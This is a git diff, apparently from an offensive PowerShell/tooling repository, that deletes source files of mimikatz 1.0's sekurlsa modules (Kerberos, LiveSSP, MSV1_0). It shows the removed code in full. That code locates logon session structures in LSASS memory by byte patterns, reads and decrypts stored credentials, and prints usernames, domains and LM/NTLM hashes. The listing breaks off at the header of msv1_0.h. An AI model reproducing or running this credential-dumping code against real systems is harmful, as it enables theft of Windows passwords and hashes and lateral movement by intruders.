Diffstat (limited to 'Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages')
12 files changed, 0 insertions, 1016 deletions
| diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/kerberos.cpp b/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/kerberos.cpp
deleted file mode 100644
index dae52d2..0000000
--- a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/kerberos.cpp
+++ /dev/null
@@ -1,135 +0,0 @@ -/*	Benjamin DELPY `gentilkiwi` -	http://blog.gentilkiwi.com -	benjamin@gentilkiwi.com -	Licence    : http://creativecommons.org/licenses/by/3.0/fr/ -	Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "kerberos.h" -#include "..\..\global.h" -mod_process::PKIWI_VERY_BASIC_MODULEENTRY mod_mimikatz_sekurlsa_kerberos::pModKERBEROS = NULL; -mod_mimikatz_sekurlsa_kerberos::PKIWI_KERBEROS_LOGON_SESSION mod_mimikatz_sekurlsa_kerberos::KerbLogonSessionList = NULL; //reinterpret_cast<mod_mimikatz_sekurlsa_kerberos::PKIWI_KERBEROS_LOGON_SESSION>(NULL); -long mod_mimikatz_sekurlsa_kerberos::offsetMagic = 0; -PRTL_AVL_TABLE mod_mimikatz_sekurlsa_kerberos::KerbGlobalLogonSessionTable = NULL; //reinterpret_cast<PRTL_AVL_TABLE>(NULL); - -bool mod_mimikatz_sekurlsa_kerberos::getKerberos(vector<wstring> * arguments) -{ -	vector<pair<mod_mimikatz_sekurlsa::PFN_ENUM_BY_LUID, wstring>> monProvider; -	monProvider.push_back(make_pair<mod_mimikatz_sekurlsa::PFN_ENUM_BY_LUID, wstring>(getKerberosLogonData, wstring(L"kerberos"))); -	return mod_mimikatz_sekurlsa::getLogonData(arguments, &monProvider); -} - -bool mod_mimikatz_sekurlsa_kerberos::searchKerberosFuncs() -{ -#ifdef _M_X64 -	BYTE PTRN_WALL_KerbUnloadLogonSessionTable[]= {0x48, 0x8b, 0x18, 0x48, 0x8d, 0x0d}; -	LONG OFFS_WALL_KerbUnloadLogonSessionTable	= sizeof(PTRN_WALL_KerbUnloadLogonSessionTable); - -	BYTE PTRN_WALL_KerbFreeLogonSessionList[]	= {0x48, 0x3b, 0xfe, 0x0f, 0x84}; -	LONG OFFS_WALL_KerbFreeLogonSessionList		= -4; -#elif defined _M_IX86 -	BYTE PTRN_WNO8_KerbUnloadLogonSessionTable[]= {0x85, 0xc0, 0x74, 0x1f, 0x53}; -	LONG OFFS_WNO8_KerbUnloadLogonSessionTable	= -(3 + 4); -	BYTE PTRN_WIN8_KerbUnloadLogonSessionTable[]= {0x85, 0xc0, 0x74, 0x2b, 0x57}; // 2c au lieu de 2b pour avant le RC -	LONG OFFS_WIN8_KerbUnloadLogonSessionTable	= -(6 + 4); - -	BYTE PTRN_WALL_KerbFreeLogonSessionList[]	= {0xeb, 0x0f, 0x6a, 0x01, 0x57, 0x56, 0xe8}; -	LONG OFFS_WALL_KerbFreeLogonSessionList		= 
-4; -#endif -	if(mod_mimikatz_sekurlsa::searchLSASSDatas() && pModKERBEROS && !(KerbGlobalLogonSessionTable || KerbLogonSessionList)) -	{ -		PBYTE *pointeur = NULL; PBYTE pattern = NULL; ULONG taille = 0; LONG offset = 0; - -		if(mod_system::GLOB_Version.dwMajorVersion < 6) -		{ -			pointeur= reinterpret_cast<PBYTE *>(&KerbLogonSessionList); -			pattern	= PTRN_WALL_KerbFreeLogonSessionList; -			taille	= sizeof(PTRN_WALL_KerbFreeLogonSessionList); -			offset	= OFFS_WALL_KerbFreeLogonSessionList; - -			if(mod_system::GLOB_Version.dwMinorVersion < 2) -				offsetMagic = 8; -		} -		else -		{ -			pointeur= reinterpret_cast<PBYTE *>(&KerbGlobalLogonSessionTable); - -#ifdef _M_X64 -			pattern	= PTRN_WALL_KerbUnloadLogonSessionTable; -			taille	= sizeof(PTRN_WALL_KerbUnloadLogonSessionTable); -			offset	= OFFS_WALL_KerbUnloadLogonSessionTable; -#elif defined _M_IX86 -			if(mod_system::GLOB_Version.dwBuildNumber < 8000) -			{ -				pattern	= PTRN_WNO8_KerbUnloadLogonSessionTable; -				taille	= sizeof(PTRN_WNO8_KerbUnloadLogonSessionTable); -				offset	= OFFS_WNO8_KerbUnloadLogonSessionTable; -			} -			else -			{ -				if(mod_system::GLOB_Version.dwBuildNumber < 8400) // petite correction pour avant la RC -					PTRN_WIN8_KerbUnloadLogonSessionTable[3] = 0x2c; -				pattern	= PTRN_WIN8_KerbUnloadLogonSessionTable; -				taille	= sizeof(PTRN_WIN8_KerbUnloadLogonSessionTable); -				offset	= OFFS_WIN8_KerbUnloadLogonSessionTable; -			} -#endif -		} - -		if(HMODULE monModule = LoadLibrary(L"kerberos")) -		{ -			MODULEINFO mesInfos; -			if(GetModuleInformation(GetCurrentProcess(), monModule, &mesInfos, sizeof(MODULEINFO))) -			{ -				mod_memory::genericPatternSearch(pointeur, L"kerberos", pattern, taille, offset); -				*pointeur += pModKERBEROS->modBaseAddr - reinterpret_cast<PBYTE>(mesInfos.lpBaseOfDll); -			} -			FreeLibrary(monModule); -		} -	} -	return (pModKERBEROS && (KerbGlobalLogonSessionTable || KerbLogonSessionList)); -} - -bool WINAPI 
mod_mimikatz_sekurlsa_kerberos::getKerberosLogonData(__in PLUID logId, __in bool justSecurity) -{ -	if(searchKerberosFuncs()) -	{ -		PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCreds = NULL; -		DWORD taille; -		BYTE * monBuff = NULL; -		 -		if(KerbGlobalLogonSessionTable) -		{ -			taille = sizeof(KIWI_KERBEROS_PRIMARY_CREDENTIAL); -			monBuff = new BYTE[taille]; -			 -			if(PKIWI_KERBEROS_PRIMARY_CREDENTIAL pLogSession = reinterpret_cast<PKIWI_KERBEROS_PRIMARY_CREDENTIAL>(mod_mimikatz_sekurlsa::getPtrFromAVLByLuid(KerbGlobalLogonSessionTable, FIELD_OFFSET(KIWI_KERBEROS_PRIMARY_CREDENTIAL, LocallyUniqueIdentifier), logId))) -			{ -				if(mod_memory::readMemory(pLogSession, monBuff, taille, mod_mimikatz_sekurlsa::hLSASS)) -				{ -					pLogSession = reinterpret_cast<PKIWI_KERBEROS_PRIMARY_CREDENTIAL>(monBuff); -					mesCreds =  &pLogSession->credentials; -				} -			} -		} -		else -		{ -			taille = sizeof(KIWI_KERBEROS_LOGON_SESSION) + offsetMagic; -			monBuff = new BYTE[taille]; -			if(PKIWI_KERBEROS_LOGON_SESSION pLogSession = reinterpret_cast<PKIWI_KERBEROS_LOGON_SESSION>(mod_mimikatz_sekurlsa::getPtrFromLinkedListByLuid(reinterpret_cast<PLIST_ENTRY>(KerbLogonSessionList), FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, LocallyUniqueIdentifier) + offsetMagic, logId))) -			{ -				if(mod_memory::readMemory(pLogSession, monBuff, taille, mod_mimikatz_sekurlsa::hLSASS)) -				{ -					pLogSession = reinterpret_cast<PKIWI_KERBEROS_LOGON_SESSION>(monBuff); -					if(offsetMagic != 0) -						pLogSession = reinterpret_cast<PKIWI_KERBEROS_LOGON_SESSION>(reinterpret_cast<PBYTE>(pLogSession) + offsetMagic); -					mesCreds =  &pLogSession->credentials; -				} -			} -		} -		mod_mimikatz_sekurlsa::genericCredsToStream(mesCreds, justSecurity); -		delete [] monBuff; -	} -	else (*outputStream) << L"n.a. (kerberos KO)"; - -	return true; -} 
diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/kerberos.h b/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/kerberos.h
deleted file mode 100644
index 1418d4f..0000000
--- a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/kerberos.h
+++ /dev/null
@@ -1,70 +0,0 @@ -/*	Benjamin DELPY `gentilkiwi` -	http://blog.gentilkiwi.com -	benjamin@gentilkiwi.com -	Licence    : http://creativecommons.org/licenses/by/3.0/fr/ -	Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "../mod_mimikatz_sekurlsa.h" - -class mod_mimikatz_sekurlsa_kerberos { - -private: -	typedef struct _KIWI_KERBEROS_LOGON_SESSION -	{ -		struct _KIWI_KERBEROS_LOGON_SESSION *Flink; -		struct _KIWI_KERBEROS_LOGON_SESSION *Blink; -		DWORD	UsageCount; -		PVOID	unk0; -		PVOID	unk1; -		PVOID	unk2; -		DWORD	unk3; -		DWORD	unk4; -		PVOID	unk5; -		PVOID	unk6; -		PVOID	unk7; -		LUID LocallyUniqueIdentifier; -	#ifdef _M_IX86 -		DWORD	unk8; -	#endif -		DWORD	unk9; -		DWORD	unk10; -		PVOID	unk11; -		DWORD	unk12; -		DWORD	unk13; -		PVOID	unk14; -		PVOID	unk15; -		PVOID	unk16; -		KIWI_GENERIC_PRIMARY_CREDENTIAL	credentials; -	} KIWI_KERBEROS_LOGON_SESSION, *PKIWI_KERBEROS_LOGON_SESSION; - -	typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL -	{ -		DWORD unk0; -		PVOID unk1; -		PVOID unk2; -		PVOID unk3; -	#ifdef _M_X64 -		BYTE unk4[32]; -	#elif defined _M_IX86 -		BYTE unk4[20]; -	#endif -		LUID LocallyUniqueIdentifier; -	#ifdef _M_X64 -		BYTE unk5[44]; -	#elif defined _M_IX86 -		BYTE unk5[36]; -	#endif -		KIWI_GENERIC_PRIMARY_CREDENTIAL	credentials; -	} KIWI_KERBEROS_PRIMARY_CREDENTIAL, *PKIWI_KERBEROS_PRIMARY_CREDENTIAL; - -	static PKIWI_KERBEROS_LOGON_SESSION KerbLogonSessionList; -	static long offsetMagic; -	static PRTL_AVL_TABLE KerbGlobalLogonSessionTable; -	static bool searchKerberosFuncs(); - -public: -	static mod_process::PKIWI_VERY_BASIC_MODULEENTRY pModKERBEROS; -	static bool getKerberos(vector<wstring> * arguments); -	static bool WINAPI getKerberosLogonData(__in PLUID logId, __in bool justSecurity); -}; diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/livessp.cpp b/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/livessp.cpp deleted file mode 100644 index 7f64678..0000000 
--- a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/livessp.cpp
+++ /dev/null
@@ -1,70 +0,0 @@ -/*	Benjamin DELPY `gentilkiwi` -	http://blog.gentilkiwi.com -	benjamin@gentilkiwi.com -	Licence    : http://creativecommons.org/licenses/by/3.0/fr/ -	Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "livessp.h" -#include "..\..\global.h" -mod_process::PKIWI_VERY_BASIC_MODULEENTRY mod_mimikatz_sekurlsa_livessp::pModLIVESSP = NULL; -mod_mimikatz_sekurlsa_livessp::PKIWI_LIVESSP_LIST_ENTRY mod_mimikatz_sekurlsa_livessp::LiveGlobalLogonSessionList = NULL;//reinterpret_cast<mod_mimikatz_sekurlsa_livessp::PKIWI_LIVESSP_LIST_ENTRY>(NULL); - -bool mod_mimikatz_sekurlsa_livessp::getLiveSSP(vector<wstring> * arguments) -{ -	vector<pair<mod_mimikatz_sekurlsa::PFN_ENUM_BY_LUID, wstring>> monProvider; -	monProvider.push_back(make_pair<mod_mimikatz_sekurlsa::PFN_ENUM_BY_LUID, wstring>(getLiveSSPLogonData, wstring(L"livessp"))); -	return mod_mimikatz_sekurlsa::getLogonData(arguments, &monProvider); -} - -bool mod_mimikatz_sekurlsa_livessp::searchLiveGlobalLogonSessionList() -{ -#ifdef _M_X64 -	BYTE PTRN_WALL_LiveUpdatePasswordForLogonSessions[]	= {0x48, 0x83, 0x65, 0xdf, 0x00, 0x48, 0x83, 0x65, 0xef, 0x00, 0x48, 0x83, 0x65, 0xe7, 0x00}; -#elif defined _M_IX86 -	BYTE PTRN_WALL_LiveUpdatePasswordForLogonSessions[]	= {0x89, 0x5d, 0xdc, 0x89, 0x5d, 0xe4, 0x89, 0x5d, 0xe0}; -#endif -	LONG OFFS_WALL_LiveUpdatePasswordForLogonSessions	= -(5 + 4); - -	if(mod_mimikatz_sekurlsa::searchLSASSDatas() && pModLIVESSP && !LiveGlobalLogonSessionList) -	{ -	 -		PBYTE *pointeur = reinterpret_cast<PBYTE *>(&LiveGlobalLogonSessionList); -		if(HMODULE monModule = LoadLibrary(L"livessp")) -		{ -			MODULEINFO mesInfos; -			if(GetModuleInformation(GetCurrentProcess(), monModule, &mesInfos, sizeof(MODULEINFO))) -			{ -				mod_memory::genericPatternSearch(pointeur, L"livessp", PTRN_WALL_LiveUpdatePasswordForLogonSessions, sizeof(PTRN_WALL_LiveUpdatePasswordForLogonSessions), OFFS_WALL_LiveUpdatePasswordForLogonSessions); -				*pointeur += pModLIVESSP->modBaseAddr - 
reinterpret_cast<PBYTE>(mesInfos.lpBaseOfDll); -			} -			FreeLibrary(monModule); -		} -	} -	return (pModLIVESSP && LiveGlobalLogonSessionList); -} - -bool WINAPI mod_mimikatz_sekurlsa_livessp::getLiveSSPLogonData(__in PLUID logId, __in bool justSecurity) -{ -	if(searchLiveGlobalLogonSessionList()) -	{ -		PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCreds = NULL; -		BYTE * monBuffP = new BYTE[sizeof(KIWI_LIVESSP_LIST_ENTRY)], * monBuffC = new BYTE[sizeof(KIWI_LIVESSP_PRIMARY_CREDENTIAL)]; -		if(PKIWI_LIVESSP_LIST_ENTRY pLogSession = reinterpret_cast<PKIWI_LIVESSP_LIST_ENTRY>(mod_mimikatz_sekurlsa::getPtrFromLinkedListByLuid(reinterpret_cast<PLIST_ENTRY>(LiveGlobalLogonSessionList), FIELD_OFFSET(KIWI_LIVESSP_LIST_ENTRY, LocallyUniqueIdentifier), logId))) -		{ -			if(mod_memory::readMemory(pLogSession, monBuffP, sizeof(KIWI_LIVESSP_LIST_ENTRY), mod_mimikatz_sekurlsa::hLSASS)) -			{ -				pLogSession = reinterpret_cast<PKIWI_LIVESSP_LIST_ENTRY>(monBuffP); -				if(pLogSession->suppCreds) -				{ -					if(mod_memory::readMemory(pLogSession->suppCreds, monBuffC, sizeof(KIWI_LIVESSP_PRIMARY_CREDENTIAL), mod_mimikatz_sekurlsa::hLSASS)) -						mesCreds = &(reinterpret_cast<PKIWI_LIVESSP_PRIMARY_CREDENTIAL>(monBuffC)->credentials); -				} -				else (*outputStream) << L"n.s. (SuppCred KO) / "; -			} -		} -		mod_mimikatz_sekurlsa::genericCredsToStream(mesCreds, justSecurity, true); -		delete [] monBuffC, monBuffP; -	} -	else (*outputStream) << L"n.a. (livessp KO)"; -	return true; -}
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/livessp.h b/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/livessp.h deleted file mode 100644 index 891da63..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/livessp.h +++ /dev/null @@ -1,44 +0,0 @@ -/*	Benjamin DELPY `gentilkiwi` -	http://blog.gentilkiwi.com -	benjamin@gentilkiwi.com -	Licence    : http://creativecommons.org/licenses/by/3.0/fr/ -	Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "../mod_mimikatz_sekurlsa.h" - -class mod_mimikatz_sekurlsa_livessp { - -private: -	typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL -	{ -		DWORD isSupp;	// 88h -		DWORD unk0; -		KIWI_GENERIC_PRIMARY_CREDENTIAL credentials; -	} KIWI_LIVESSP_PRIMARY_CREDENTIAL, *PKIWI_LIVESSP_PRIMARY_CREDENTIAL; - -	typedef struct _KIWI_LIVESSP_LIST_ENTRY -	{ -		struct _KIWI_LIVESSP_LIST_ENTRY *Flink; -		struct _KIWI_LIVESSP_LIST_ENTRY *Blink; -		PVOID	unk0;	// 1 -		PVOID	unk1;	// 0FFFFFFFFh -		PVOID	unk2;	// 0FFFFFFFFh -		PVOID	unk3;	// 0 -		DWORD	unk4;	// 0 -		DWORD	unk5;	// 0 -		PVOID	unk6;	// 20007D0h -		LUID	LocallyUniqueIdentifier; -		LSA_UNICODE_STRING UserName; -		PVOID	unk7;	// 2000010Dh -		PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds; -	} KIWI_LIVESSP_LIST_ENTRY, *PKIWI_LIVESSP_LIST_ENTRY; - -	static PKIWI_LIVESSP_LIST_ENTRY LiveGlobalLogonSessionList; -	static bool searchLiveGlobalLogonSessionList(); - -public: -	static mod_process::PKIWI_VERY_BASIC_MODULEENTRY pModLIVESSP; -	static bool getLiveSSP(vector<wstring> * arguments); -	static bool WINAPI getLiveSSPLogonData(__in PLUID logId, __in bool justSecurity); -}; diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/msv1_0.cpp b/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/msv1_0.cpp deleted file mode 100644 index 39fa015..0000000 
--- a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/msv1_0.cpp
+++ /dev/null
@@ -1,217 +0,0 @@ -/*	Benjamin DELPY `gentilkiwi` -	http://blog.gentilkiwi.com -	benjamin@gentilkiwi.com -	Licence    : http://creativecommons.org/licenses/by/3.0/fr/ -	Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "msv1_0.h" -#include "..\..\global.h" -PLIST_ENTRY mod_mimikatz_sekurlsa_msv1_0::LogonSessionList = NULL; -PULONG mod_mimikatz_sekurlsa_msv1_0::LogonSessionListCount = NULL; - -bool mod_mimikatz_sekurlsa_msv1_0::getMSV(vector<wstring> * arguments) -{ -	vector<pair<mod_mimikatz_sekurlsa::PFN_ENUM_BY_LUID, wstring>> monProvider; -	monProvider.push_back(make_pair<mod_mimikatz_sekurlsa::PFN_ENUM_BY_LUID, wstring>(getMSVLogonData, wstring(L"msv1_0"))); -	return mod_mimikatz_sekurlsa::getLogonData(arguments, &monProvider); -} - -bool mod_mimikatz_sekurlsa_msv1_0::searchLogonSessionList() -{ -#ifdef _M_X64 -	BYTE PTRN_WIN6_LogonSessionList[]		= {0x4C, 0x03, 0xD8, 0x49, 0x8B, 0x03, 0x48, 0x89};//, 0x06, 0x4C, 0x89, 0x5E}; -	BYTE PTRN_WIN5_LogonSessionList[]		= {0x4C, 0x8B, 0xDF, 0x49, 0xC1, 0xE3, 0x04, 0x48, 0x8B, 0xCB, 0x4C, 0x03, 0xD8}; -	 -	LONG OFFS_WALL_LogonSessionList			= -sizeof(long); -	LONG OFFS_WN60_LogonSessionListCount	= OFFS_WALL_LogonSessionList - (3 + 4 + 3 + 6 + 3 + 2 + 8 + 7 + 4 + 4 + 2 + 3 + 3 + sizeof(long)); -	LONG OFFS_WN61_LogonSessionListCount	= OFFS_WALL_LogonSessionList - (3 + 4 + 3 + 6 + 3 + 2 + 8 + 7 + 4 + 4 + 2 + 3 + 2 + sizeof(long)); -	LONG OFFS_WIN5_LogonSessionListCount	= OFFS_WALL_LogonSessionList - (3 + 6 + 3 + 8 + 4 + 4 + 2 + 3 + 2 + 2 + sizeof(long)); -	LONG OFFS_WIN8_LogonSessionListCount	= OFFS_WALL_LogonSessionList - (3 + 4 + 3 + 6 + 3 + 2 + 3 + 7 + 7 + 4 + 4 + 2 + 3 + 2 + sizeof(long)); -#elif defined _M_IX86 -	BYTE PTRN_WNO8_LogonSessionList[]		= {0x89, 0x71, 0x04, 0x89, 0x30, 0x8D, 0x04, 0xBD}; -	BYTE PTRN_WIN8_LogonSessionList[]		= {0x89, 0x79, 0x04, 0x89, 0x38, 0x8D, 0x04, 0xB5}; -	BYTE PTRN_WN51_LogonSessionList[]		= {0xFF, 0x50, 0x10, 0x85, 0xC0, 0x0F, 0x84}; - -	LONG 
OFFS_WNO8_LogonSessionList			= -(7 + (sizeof(LONG))); -	LONG OFFS_WIN8_LogonSessionList			= -(6 + 3 + 3 + 2 + 2 + (sizeof(LONG))); -	LONG OFFS_WN51_LogonSessionList			= sizeof(PTRN_WN51_LogonSessionList) + 4 + 5 + 1 + 6 + 1; -	LONG OFFS_WNO8_LogonSessionListCount	= OFFS_WNO8_LogonSessionList - (3 + 6 + 1 + 2 + 6 + 3 + 2 + 3 + 1 + sizeof(long)); -	LONG OFFS_WIN5_LogonSessionListCount	= OFFS_WNO8_LogonSessionList - (3 + 6 + 1 + 2 + 6 + 3 + 2 + 1 + 3 + 1 + sizeof(long)); -	LONG OFFS_WIN8_LogonSessionListCount	= OFFS_WIN8_LogonSessionList - (3 + 6 + 1 + 2 + 6 + 3 + 2 + 3 + 1 + sizeof(long)); -#endif -	if(mod_mimikatz_sekurlsa::searchLSASSDatas() && mod_mimikatz_sekurlsa::hLsaSrv && mod_mimikatz_sekurlsa::pModLSASRV && !LogonSessionList) -	{ -		PBYTE *pointeur = NULL; PBYTE pattern = NULL; ULONG taille = 0; LONG offsetListe = 0, offsetCount = 0; -#ifdef _M_X64 -		offsetListe	= OFFS_WALL_LogonSessionList; -		if(mod_system::GLOB_Version.dwMajorVersion < 6) -		{ -			pattern	= PTRN_WIN5_LogonSessionList; -			taille	= sizeof(PTRN_WIN5_LogonSessionList); -			offsetCount = OFFS_WIN5_LogonSessionListCount; -		} -		else -		{ -			pattern	= PTRN_WIN6_LogonSessionList; -			taille	= sizeof(PTRN_WIN6_LogonSessionList); -			if(mod_system::GLOB_Version.dwBuildNumber < 8000) -				offsetCount = (mod_system::GLOB_Version.dwMinorVersion < 1) ? 
OFFS_WN60_LogonSessionListCount : OFFS_WN61_LogonSessionListCount; -			else -				offsetCount = OFFS_WIN8_LogonSessionListCount; -		} -#elif defined _M_IX86 -		if(mod_system::GLOB_Version.dwBuildNumber < 8000) -		{ -			if((mod_system::GLOB_Version.dwMajorVersion == 5) && (mod_system::GLOB_Version.dwMinorVersion == 1)) -			{ -				pattern	= PTRN_WN51_LogonSessionList; -				taille	= sizeof(PTRN_WN51_LogonSessionList); -				offsetListe	= OFFS_WN51_LogonSessionList; -			} -			else -			{ -				pattern	= PTRN_WNO8_LogonSessionList; -				taille	= sizeof(PTRN_WNO8_LogonSessionList); -				offsetListe	= OFFS_WNO8_LogonSessionList; -				offsetCount = (mod_system::GLOB_Version.dwMajorVersion < 6) ? OFFS_WIN5_LogonSessionListCount : OFFS_WNO8_LogonSessionListCount; -			} -		} -		else -		{ -			pattern	= PTRN_WIN8_LogonSessionList; -			taille	= sizeof(PTRN_WIN8_LogonSessionList); -			offsetListe	= OFFS_WIN8_LogonSessionList; -			offsetCount = OFFS_WIN8_LogonSessionListCount; -		} -#endif -		MODULEINFO mesInfos; -		if(GetModuleInformation(GetCurrentProcess(), mod_mimikatz_sekurlsa::hLsaSrv, &mesInfos, sizeof(MODULEINFO))) -		{ -			pointeur = reinterpret_cast<PBYTE *>(&LogonSessionList); -			if(mod_memory::genericPatternSearch(pointeur, L"lsasrv", pattern, taille, offsetListe)) -			{ -				*pointeur += mod_mimikatz_sekurlsa::pModLSASRV->modBaseAddr - reinterpret_cast<PBYTE>(mesInfos.lpBaseOfDll); -				if(offsetCount) -				{ -					pointeur = reinterpret_cast<PBYTE *>(&LogonSessionListCount); -					if(mod_memory::genericPatternSearch(pointeur, L"lsasrv", pattern, taille, offsetCount)) -						*pointeur += mod_mimikatz_sekurlsa::pModLSASRV->modBaseAddr - reinterpret_cast<PBYTE>(mesInfos.lpBaseOfDll); -				} -			} -		} -	} -	return (mod_mimikatz_sekurlsa::hLsaSrv && mod_mimikatz_sekurlsa::pModLSASRV && LogonSessionList && (((mod_system::GLOB_Version.dwMajorVersion == 5) && (mod_system::GLOB_Version.dwMinorVersion == 1)) || LogonSessionListCount)); -} - -bool WINAPI 
mod_mimikatz_sekurlsa_msv1_0::getMSVLogonData(__in PLUID logId, __in bool justSecurity) -{ -	if(searchLogonSessionList()) -	{ -		LONG offsetToLuid, offsetToCredentials; -		if(mod_system::GLOB_Version.dwMajorVersion < 6) -		{ -			offsetToLuid = FIELD_OFFSET(KIWI_MSV1_0_LIST_5, LocallyUniqueIdentifier); -			offsetToCredentials = FIELD_OFFSET(KIWI_MSV1_0_LIST_5, Credentials); -		} -		else -		{ -			offsetToLuid = FIELD_OFFSET(KIWI_MSV1_0_LIST_6, LocallyUniqueIdentifier); -			offsetToCredentials = FIELD_OFFSET(KIWI_MSV1_0_LIST_6, Credentials); -			if(mod_system::GLOB_Version.dwBuildNumber >= 8000)	 // pas encore pris le temps de regarder les structures de 8 -			{ -#ifdef _M_X64 -				offsetToCredentials += 4*sizeof(PVOID); -#elif defined _M_IX86 -				offsetToCredentials += 2*sizeof(PVOID); -#endif -			} -		} -		 -		ULONG nbListes = 0; -		if(LogonSessionListCount) -			mod_memory::readMemory(LogonSessionListCount, &nbListes, sizeof(nbListes), mod_mimikatz_sekurlsa::hLSASS); -		else nbListes = 1; - -		PLIST_ENTRY pLogSession = NULL; -		for(ULONG i = 0; i < nbListes; i++) -		{ -			if(pLogSession = mod_mimikatz_sekurlsa::getPtrFromLinkedListByLuid(reinterpret_cast<PLIST_ENTRY>(LogonSessionList + i), offsetToLuid, logId)) -			{ -				BYTE * kiwiMSVListEntry = new BYTE[offsetToCredentials + sizeof(PVOID)]; -				if(mod_memory::readMemory(pLogSession, kiwiMSVListEntry, offsetToCredentials + sizeof(PVOID), mod_mimikatz_sekurlsa::hLSASS)) -				{ -					PVOID monPtr = *reinterpret_cast<PVOID *>(kiwiMSVListEntry + offsetToCredentials); -					if(monPtr) -					{ -						BYTE * kiwiMSVCredentials = new BYTE[sizeof(KIWI_MSV1_0_CREDENTIALS)]; -						if(mod_memory::readMemory(monPtr, kiwiMSVCredentials, sizeof(KIWI_MSV1_0_CREDENTIALS), mod_mimikatz_sekurlsa::hLSASS)) -						{ -							PKIWI_MSV1_0_CREDENTIALS mesCreds = reinterpret_cast<PKIWI_MSV1_0_CREDENTIALS>(kiwiMSVCredentials); -							if(mesCreds->PrimaryCredentials) -							{ -								BYTE * kiwiMSVPrimaryCredentials = new 
BYTE[sizeof(KIWI_MSV1_0_PRIMARY_CREDENTIALS)]; -								if(mod_memory::readMemory(mesCreds->PrimaryCredentials, kiwiMSVPrimaryCredentials, sizeof(KIWI_MSV1_0_PRIMARY_CREDENTIALS), mod_mimikatz_sekurlsa::hLSASS)) -								{ -									decryptAndDisplayCredsBlock(&reinterpret_cast<PKIWI_MSV1_0_PRIMARY_CREDENTIALS>(kiwiMSVPrimaryCredentials)->Credentials, justSecurity); -								} else (*outputStream) << L"n.e. (Lecture KIWI_MSV1_0_PRIMARY_CREDENTIALS KO)"; -								delete [] kiwiMSVPrimaryCredentials; - -							} else (*outputStream) << L"n.s. (PrimaryCredentials KO)"; - -						}else (*outputStream) << L"n.e. (Lecture KIWI_MSV1_0_CREDENTIALS KO)"; -						delete [] kiwiMSVCredentials; - -					} else (*outputStream) << L"n.s. (Credentials KO)"; - -				} else (*outputStream) << L"n.e. (Lecture KIWI_MSV1_0_LIST KO)"; -				delete [] kiwiMSVListEntry; - -				break; -			} -		} -		if(!pLogSession) -			(*outputStream) << L"n.t. (LUID KO)"; -	} -	else (*outputStream) << L"n.a. (msv1_0 KO)"; -	return true; -} - -bool mod_mimikatz_sekurlsa_msv1_0::decryptAndDisplayCredsBlock(LSA_UNICODE_STRING * monBlock, bool justSecurity) -{ -	if(monBlock->Length > 0 && monBlock->MaximumLength > 0 && monBlock->Buffer) -	{ -		BYTE * monBuffer = new BYTE[monBlock->MaximumLength]; -		if(mod_memory::readMemory(monBlock->Buffer, monBuffer, monBlock->MaximumLength, mod_mimikatz_sekurlsa::hLSASS)) -		{ -			mod_mimikatz_sekurlsa::SeckPkgFunctionTable->LsaUnprotectMemory(monBuffer, monBlock->Length); -			PMSV1_0_PRIMARY_CREDENTIAL mesCreds = reinterpret_cast<PMSV1_0_PRIMARY_CREDENTIAL>(monBuffer); -			 -			NlpMakeRelativeOrAbsoluteString(mesCreds, &mesCreds->UserName, false); -			NlpMakeRelativeOrAbsoluteString(mesCreds, &mesCreds->LogonDomainName, false); - -			wstring lmHash = mod_text::stringOfHex(mesCreds->LmOwfPassword, sizeof(mesCreds->LmOwfPassword)); -			wstring ntHash = mod_text::stringOfHex(mesCreds->NtOwfPassword, sizeof(mesCreds->NtOwfPassword)); - -			if(justSecurity) -				(*outputStream) 
<< L"lm{ " << lmHash << L" }, ntlm{ " << ntHash << L" }"; -			else -			{ -				(*outputStream) << endl << -					L"\t * Utilisateur  : " << mod_text::stringOfSTRING(mesCreds->UserName) << endl << -					L"\t * Domaine      : " << mod_text::stringOfSTRING(mesCreds->LogonDomainName) << endl << -					L"\t * Hash LM      : " << lmHash << endl << -					L"\t * Hash NTLM    : " << ntHash; -			} -		} else (*outputStream) << L"n.e. (Lecture Block Credentials KO)"; - -		delete [] monBuffer; -	} else (*outputStream) << L"n.s. (Block Credentials KO)"; - -	return true; -} - -void mod_mimikatz_sekurlsa_msv1_0::NlpMakeRelativeOrAbsoluteString(PVOID BaseAddress, PLSA_UNICODE_STRING String, bool relative) -{ -	if(String->Buffer) -		String->Buffer = reinterpret_cast<wchar_t *>(reinterpret_cast<ULONG_PTR>(String->Buffer) + ((relative ? -1 : 1) * reinterpret_cast<ULONG_PTR>(BaseAddress))); -}
\ No newline at end of file
diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/msv1_0.h b/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/msv1_0.h
deleted file mode 100644
index cf8ccac..0000000
--- a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/msv1_0.h
+++ /dev/null
